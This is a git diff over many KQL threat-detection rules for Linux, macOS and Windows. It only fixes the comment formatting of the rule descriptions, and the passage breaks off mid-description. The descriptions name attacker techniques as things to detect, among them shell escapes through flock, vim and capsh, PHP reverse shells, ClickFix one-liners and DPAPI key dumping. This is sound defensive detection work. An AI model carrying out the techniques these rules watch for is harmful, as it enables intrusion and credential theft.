a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql index 6c2feb35..67b5bef1 100644 --- a/KQL/rules/Discovery/shell_execution_via_flock_linux.kql +++ b/KQL/rules/Discovery/shell_execution_via_flock_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects the use of the "flock" command to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1083 diff --git a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql index 7972f9a9..c927de1c 100644 --- a/KQL/rules/Discovery/shell_execution_via_nice_linux.kql +++ b/KQL/rules/Discovery/shell_execution_via_nice_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects the use of the "nice" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1083 diff --git a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql index 227da4e0..ad38aa3a 100644 --- a/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql +++ b/KQL/rules/Discovery/shell_invocation_via_apt_linux.kql @@ -3,8 +3,7 @@ // Date: 2022-12-28 // Level: medium // Description: Detects the use of the "apt" and "apt-get" commands to execute a shell or proxy commands. -Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. - +// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1083 diff --git a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql index 863b4d79..2d60224e 100644 --- a/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql +++ b/KQL/rules/Discovery/suspicious_group_and_account_reconnaissance_activity_using_net_exe.kql @@ -3,8 +3,7 @@ // Date: 2019-01-16 // Level: medium // Description: Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE -Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) - +// Check if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM) // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1087.001, attack.t1087.002 // False Positives: diff --git a/KQL/rules/Discovery/suspicious_where_execution.kql b/KQL/rules/Discovery/suspicious_where_execution.kql index 53b1b25c..d2a72589 100644 --- a/KQL/rules/Discovery/suspicious_where_execution.kql +++ b/KQL/rules/Discovery/suspicious_where_execution.kql @@ -3,9 +3,8 @@ // Date: 2021-12-13 // Level: low // Description: Adversaries may enumerate browser bookmarks to learn more about compromised hosts. -Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about -internal network resources such as servers, tools/dashboards, or other related infrastructure. - +// Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about +// internal network resources such as servers, tools/dashboards, or other related infrastructure. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1217 diff --git a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql index 3e3bd8b8..18badf3a 100644 --- a/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql +++ b/KQL/rules/Discovery/system_information_discovery_using_ioreg.kql @@ -3,9 +3,8 @@ // Date: 2023-12-20 // Level: medium // Description: Detects the use of "ioreg" which will show I/O Kit registry information. -This process is used for system information discovery. -It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings. - +// This process is used for system information discovery. +// It has been observed in-the-wild by calling this process directly or using bash and grep to look for specific strings. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1082 // False Positives: diff --git a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql index c317d814..2cdc3098 100644 --- a/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql +++ b/KQL/rules/Discovery/system_information_discovery_using_system_profiler.kql @@ -3,8 +3,7 @@ // Date: 2024-01-02 // Level: medium // Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. -This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes. - +// This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.defense-evasion, attack.t1082, attack.t1497.001 // False Positives: diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql index 6c39bf7b..3ef42ec5 100644 --- a/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql +++ b/KQL/rules/Discovery/system_integrity_protection_sip_disabled.kql @@ -3,7 +3,6 @@ // Date: 2024-01-02 // Level: medium // Description: Detects the use of csrutil to disable the Configure System Integrity Protection (SIP). This technique is used in post-exploit scenarios. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1518.001 diff --git a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql index d9be9e23..400f1fad 100644 --- a/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql +++ b/KQL/rules/Discovery/system_integrity_protection_sip_enumeration.kql @@ -3,7 +3,6 @@ // Date: 2024-01-02 // Level: low // Description: Detects the use of csrutil to view the Configure System Integrity Protection (SIP) status. This technique is used in post-exploit scenarios. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1518.001 // False Positives: diff --git a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql index 8c788be5..f68dcd15 100644 --- a/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql +++ b/KQL/rules/Discovery/uncommon_connection_to_active_directory_web_services.kql @@ -3,7 +3,6 @@ // Date: 2024-01-26 // Level: medium // Description: Detects uncommon network connections to the Active Directory Web Services (ADWS) from processes not typically associated with ADWS management. - // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1087 // False Positives: diff --git a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql index 3ff984b5..ca8c4e76 100644 --- a/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql +++ b/KQL/rules/Discovery/uncommon_system_information_discovery_via_wmic_exe.kql @@ -3,10 +3,9 @@ // Date: 2023-01-26 // Level: medium // Description: Detects the use of the WMI command-line (WMIC) utility to identify and display various system information, -including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, -and GPU driver products/versions. -Some of these commands were used by Aurora Stealer in late 2022/early 2023. - +// including OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS, +// and GPU driver products/versions. +// Some of these commands were used by Aurora Stealer in late 2022/early 2023. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1082 diff --git a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql index b15c895f..f0532d8f 100644 --- a/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql +++ b/KQL/rules/Discovery/vim_gtfobin_abuse_linux.kql @@ -3,8 +3,7 @@ // Date: 2022-12-28 // Level: high // Description: Detects the use of "vim" and it's siblings commands to execute a shell or proxy commands. -Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. - +// Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments. // MITRE Tactic: Discovery // Tags: attack.discovery, attack.t1083 diff --git a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql index e24bcbd5..5dae167d 100644 --- a/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql +++ b/KQL/rules/Execution/assembly_dll_creation_via_aspnetcompiler.kql @@ -3,7 +3,6 @@ // Date: 2023-08-14 // Level: medium // Description: Detects the creation of new DLL assembly files by "aspnet_compiler.exe", which could be a sign of "aspnet_compiler" abuse to proxy execution through a build provider. - // MITRE Tactic: Execution // Tags: attack.execution // False Positives: diff --git a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql index 48d40c08..cc1de169 100644 --- a/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql +++ b/KQL/rules/Execution/cab_file_extraction_via_wusa_exe_from_potentially_suspicious_paths.kql @@ -3,7 +3,6 @@ // Date: 2022-08-05 // Level: high // Description: Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths. - // MITRE Tactic: Execution // Tags: attack.execution diff --git a/KQL/rules/Execution/capsh_shell_invocation_linux.kql b/KQL/rules/Execution/capsh_shell_invocation_linux.kql index fcbfc541..57c666f5 100644 --- a/KQL/rules/Execution/capsh_shell_invocation_linux.kql +++ b/KQL/rules/Execution/capsh_shell_invocation_linux.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects the use of the "capsh" utility to invoke a shell. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 diff --git a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql index 54471fa2..543d04a8 100644 --- a/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql +++ b/KQL/rules/Execution/cmd_exe_missing_space_characters_execution_anomaly.kql @@ -3,8 +3,7 @@ // Date: 2022-08-23 // Level: high // Description: Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. -This could be a sign of obfuscation of a fat finger problem (typo by the developer). - +// This could be a sign of obfuscation of a fat finger problem (typo by the developer). // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001 diff --git a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql index 15912d84..b8560c6d 100644 --- a/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql +++ b/KQL/rules/Execution/cscript_wscript_potentially_suspicious_child_process.kql @@ -3,8 +3,7 @@ // Date: 2023-05-15 // Level: medium // Description: Detects potentially suspicious child processes of Wscript/Cscript. These include processes such as rundll32 with uncommon exports or PowerShell spawning rundll32 or regsvr32. -Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. - +// Malware such as Pikabot and Qakbot were seen using similar techniques as well as many others. // MITRE Tactic: Execution // Tags: attack.execution // False Positives: diff --git a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql index a46b9780..5b99e218 100644 --- a/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql +++ b/KQL/rules/Execution/data_export_from_mssql_table_via_bcp_exe.kql @@ -3,8 +3,7 @@ // Date: 2024-08-20 // Level: medium // Description: Detects the execution of the BCP utility in order to export data from the database. -Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file. - +// Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file. // MITRE Tactic: Execution // Tags: attack.execution, attack.exfiltration, attack.t1048 // False Positives: diff --git a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql index 49d4519c..b50d21a9 100644 --- a/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql +++ b/KQL/rules/Execution/detection_of_powershell_execution_via_sqlps_exe.kql @@ -3,8 +3,7 @@ // Date: 2020-10-10 // Level: medium // Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server. -Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. - +// Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001, attack.defense-evasion, attack.t1127 // False Positives: diff --git a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql index ceede2b3..eaa5ea12 100644 --- a/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql +++ b/KQL/rules/Execution/dsinternals_suspicious_powershell_cmdlets.kql @@ -3,8 +3,7 @@ // Date: 2024-06-26 // Level: high // Description: Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. -The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. - +// The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.001 // False Positives: diff --git a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql index 3383bd6a..ce73c5e5 100644 --- a/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql +++ b/KQL/rules/Execution/filefix_suspicious_child_process_from_browser_file_upload_abuse.kql @@ -3,9 +3,8 @@ // Date: 2025-06-26 // Level: high // Description: Detects potentially suspicious subprocesses such as LOLBINs spawned by web browsers. This activity could be associated with the "FileFix" social engineering technique, -where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. -The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities. - +// where users are tricked into launching the file explorer via a browser-based phishing page and pasting malicious commands into the address bar. +// The technique abuses clipboard manipulation and disguises command execution as benign file path access, resulting in covert execution of system utilities. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204.004 // False Positives: diff --git a/KQL/rules/Execution/forfiles_command_execution.kql b/KQL/rules/Execution/forfiles_command_execution.kql index 7793cddc..35d2ea1a 100644 --- a/KQL/rules/Execution/forfiles_command_execution.kql +++ b/KQL/rules/Execution/forfiles_command_execution.kql @@ -3,9 +3,8 @@ // Date: 2022-06-14 // Level: medium // Description: Detects the execution of "forfiles" with the "/c" flag. -While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. -Can be used to bypass application whitelisting. - +// While this is an expected behavior of the tool, it can be abused in order to proxy execution through it with any binary. +// Can be used to bypass application whitelisting. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 // False Positives: diff --git a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql index 05ba71c1..2d845dfc 100644 --- a/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql +++ b/KQL/rules/Execution/fsutil_behavior_set_symlinkevaluation.kql @@ -3,8 +3,7 @@ // Date: 2022-03-02 // Level: medium // Description: A symbolic link is a type of file that contains a reference to another file. -This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt - +// This is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 // False Positives: diff --git a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql index 628c8f88..05cd8f75 100644 --- a/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql +++ b/KQL/rules/Execution/hacktool_sharpwsus_wsuspendu_execution.kql @@ -3,8 +3,7 @@ // Date: 2022-10-07 // Level: high // Description: Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. -Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations. - +// Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations. // MITRE Tactic: Execution // Tags: attack.execution, attack.lateral-movement, attack.t1210 diff --git a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql index fb234fca..a28b6a72 100644 --- a/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql +++ b/KQL/rules/Execution/ie_zonemap_setting_downgraded_to_mycomputer_zone_for_http_protocols_via_cli.kql @@ -3,7 +3,6 @@ // Date: 2023-09-05 // Level: high // Description: Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. - // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion diff --git a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql index a2c06cf5..fddb178a 100644 --- a/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql +++ b/KQL/rules/Execution/inline_python_execution_spawn_shell_via_os_system_library.kql @@ -3,7 +3,6 @@ // Date: 2024-09-02 // Level: high // Description: Detects execution of inline Python code via the "-c" in order to call the "system" function from the "os" library, and spawn a shell. - // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 diff --git a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql index cce61814..a5247255 100644 --- a/KQL/rules/Execution/installation_of_wsl_kali_linux.kql +++ b/KQL/rules/Execution/installation_of_wsl_kali_linux.kql @@ -3,8 +3,7 @@ // Date: 2025-10-10 // Level: high // Description: Detects installation of Kali Linux distribution through Windows Subsystem for Linux (WSL). -Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes. - +// Attackers may use Kali Linux WSL to leverage its penetration testing tools and capabilities for malicious purposes. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059 // False Positives: diff --git a/KQL/rules/Execution/jamf_mdm_execution.kql b/KQL/rules/Execution/jamf_mdm_execution.kql index ed6614e6..a3a3354c 100644 --- a/KQL/rules/Execution/jamf_mdm_execution.kql +++ b/KQL/rules/Execution/jamf_mdm_execution.kql @@ -3,7 +3,6 @@ // Date: 2023-08-22 // Level: low // Description: Detects execution of the "jamf" binary to create user accounts and run commands. For example, the binary can be abused by attackers on the system in order to bypass security controls or remove application control polices. - // MITRE Tactic: Execution // Tags: attack.execution // False Positives: diff --git a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql index b9b0338a..f592267e 100644 --- a/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql +++ b/KQL/rules/Execution/kaspersky_endpoint_security_stopped_via_commandline_linux.kql @@ -3,8 +3,7 @@ // Date: 2025-10-18 // Level: high // Description: Detects execution of the Kaspersky init.d stop script on Linux systems either directly or via systemctl. -This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors. - +// This activity may indicate a manual interruption of the antivirus service by an administrator, or it could be a sign of potential tampering or evasion attempts by malicious actors. // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, attack.t1562.001 // False Positives: diff --git a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql index 368b43f0..e4b8f77e 100644 --- a/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql +++ b/KQL/rules/Execution/mmc_loading_script_engines_dlls.kql @@ -3,8 +3,7 @@ // Date: 2025-02-05 // Level: medium // Description: Detects when the Microsoft Management Console (MMC) loads the DLL libraries like vbscript, jscript etc which might indicate an attempt -to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion. - +// to execute malicious scripts within a trusted system process for bypassing application whitelisting or defense evasion. // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, attack.t1059.005, attack.t1218.014 // False Positives: diff --git a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql index b31ae7fb..92d6c71a 100644 --- a/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql +++ b/KQL/rules/Execution/nodejs_execution_of_javascript_file.kql @@ -3,10 +3,9 @@ // Date: 2025-04-21 // Level: low // Description: Detects execution of JavaScript or JSC files using NodeJs binary node.exe, that could be potentially suspicious. -Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development. -Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems. -Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation. - +// Node.js is a popular open-source JavaScript runtime that runs code outside browsers and is widely used for both frontend and backend development. +// Adversaries have been observed abusing Node.js to disguise malware as legitimate processes, evade security defenses, and maintain persistence within target systems. +// Because Node.js is commonly used, this rule may generate false positives in some environments. However, if such activity is unusual in your environment, it is highly suspicious and warrants immediate investigation. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1059.007 // False Positives: diff --git a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql index ae80ce24..899b5c50 100644 --- a/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql +++ b/KQL/rules/Execution/office_application_initiated_network_connection_to_non_local_ip.kql @@ -3,9 +3,8 @@ // Date: 2021-11-10 // Level: medium // Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. -This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. -This rule will require an initial baseline and tuning that is specific to your organization. - +// This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. +// This rule will require an initial baseline and tuning that is specific to your organization. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1203 // False Positives: diff --git a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql index 5676d2ab..80463922 100644 --- a/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql +++ b/KQL/rules/Execution/outbound_network_connection_initiated_by_microsoft_dialer.kql @@ -3,9 +3,8 @@ // Date: 2024-04-26 // Level: high // Description: Detects outbound network connection initiated by Microsoft Dialer. -The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. -This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys" - +// The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer. +// This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys" // MITRE Tactic: Execution // Tags: attack.execution, attack.command-and-control, attack.t1071.001 // False Positives: diff --git a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql index d9f7fb35..bc0b587e 100644 --- a/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql +++ b/KQL/rules/Execution/potential_arbitrary_file_download_via_cmdl32_exe.kql @@ -3,9 +3,8 @@ // Date: 2021-11-03 // Level: medium // Description: Detects execution of Cmdl32 with the "/vpn" and "/lan" flags. -Attackers can abuse this utility in order to download arbitrary files via a configuration file. -Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. - +// Attackers can abuse this utility in order to download arbitrary files via a configuration file. +// Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious. // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202 diff --git a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql index 6d4b4137..0c0de02c 100644 --- a/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql +++ b/KQL/rules/Execution/potential_binary_impersonating_sysinternals_tools.kql @@ -3,9 +3,8 @@ // Date: 2021-12-20 // Level: medium // Description: Detects binaries that use the same name as legitimate sysinternals tools to evade detection. -This rule looks for the execution of binaries that are named similarly to Sysinternals tools. -Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection. - +// This rule looks for the execution of binaries that are named similarly to Sysinternals tools. +// Adversary may rename their malicious tools as legitimate Sysinternals tools to evade detection. // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, attack.t1036.005 diff --git a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql index c5fae8b5..faf42fc6 100644 --- a/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql +++ b/KQL/rules/Execution/potential_clickfix_execution_pattern_registry.kql @@ -3,10 +3,9 @@ // Date: 2025-03-25 // Level: high // Description: Detects potential ClickFix malware execution patterns by monitoring registry modifications in RunMRU keys containing HTTP/HTTPS links. -ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. -Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, -such as one-liners that execute remotely hosted malicious files or scripts. - +// ClickFix is known to be distributed through phishing campaigns and uses techniques like clipboard hijacking and fake CAPTCHA pages. +// Through the fakecaptcha pages, the adversary tricks users into opening the Run dialog box and pasting clipboard-hijacked content, +// such as one-liners that execute remotely hosted malicious files or scripts. // MITRE Tactic: Execution // Tags: attack.execution, attack.t1204.001 // False Positives: diff --git a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql index e73ec42e..12744408 100644 --- a/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql +++ b/KQL/rules/Execution/potential_dll_injection_via_acccheckconsole.kql @@ -3,9 +3,8 @@ // Date: 2022-01-06 // Level: medium // Description: Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. -One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. -The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility. - +// One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. +// The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility. // MITRE Tactic: Execution // Tags: attack.execution, detection.threat-hunting // False Positives: diff --git a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql index 86fe2b90..dac1bc7c 100644 --- a/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql +++ b/KQL/rules/Execution/potential_file_extension_spoofing_using_right_to_left_override.kql @@ -3,7 +3,6 @@ // Date: 2024-11-17 // Level: high // Description: Detects suspicious filenames that contain a right-to-left override character and a potentially spoofed file extensions. - // MITRE Tactic: Execution // Tags: attack.execution, attack.defense-evasion, attack.t1036.002 // False Positives: diff --git a/KQL/rules/Execution/potential_php_reverse_shell.kql b/KQL/rules/Execution/potential_php_reverse_shell.kql index db9e6038..72d10fd9 100644 --- a/KQL/rules/Execution/potential_php_reverse_shell.kql +++ b/KQL/rules/Execution/potential_php_reverse_shell.kql @@ -3,8 +3,7 @@ // Date: 2023-04-07 // Level: high // Description: Detects usage of the PHP CLI with the "-r" flag which allows it to run inline PHP code. The rule looks for calls to the "fsockopen" function which allows the creation of sockets. -Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. - +// Attackers often leverage this in combination with functions such as "exec" or "fopen" to initiate a reverse shell connection. // MITRE Tactic: Execution // Tags: attack.execution diff --git a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql index cecef711..d8a9aad1 100644 --- a/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql +++ b/KQL/rules/Execution/potential_product_class_reconnaissance_via_wmic_exe.kql @@ -3,9 +3,8 @@ // Date: 2023-02-14 // Level: medium // Description: Detects the execution of WMIC in order to get a list of firewall, antivirus and antispywware products. -Adversaries often enumerate security products installed on a system to identify security controls and potential ways to evade detection or disable protection mechanisms. -This information helps them plan their next attack steps and choose appropriate techniques to bypass security measures. - +// Adversaries often enumerate security 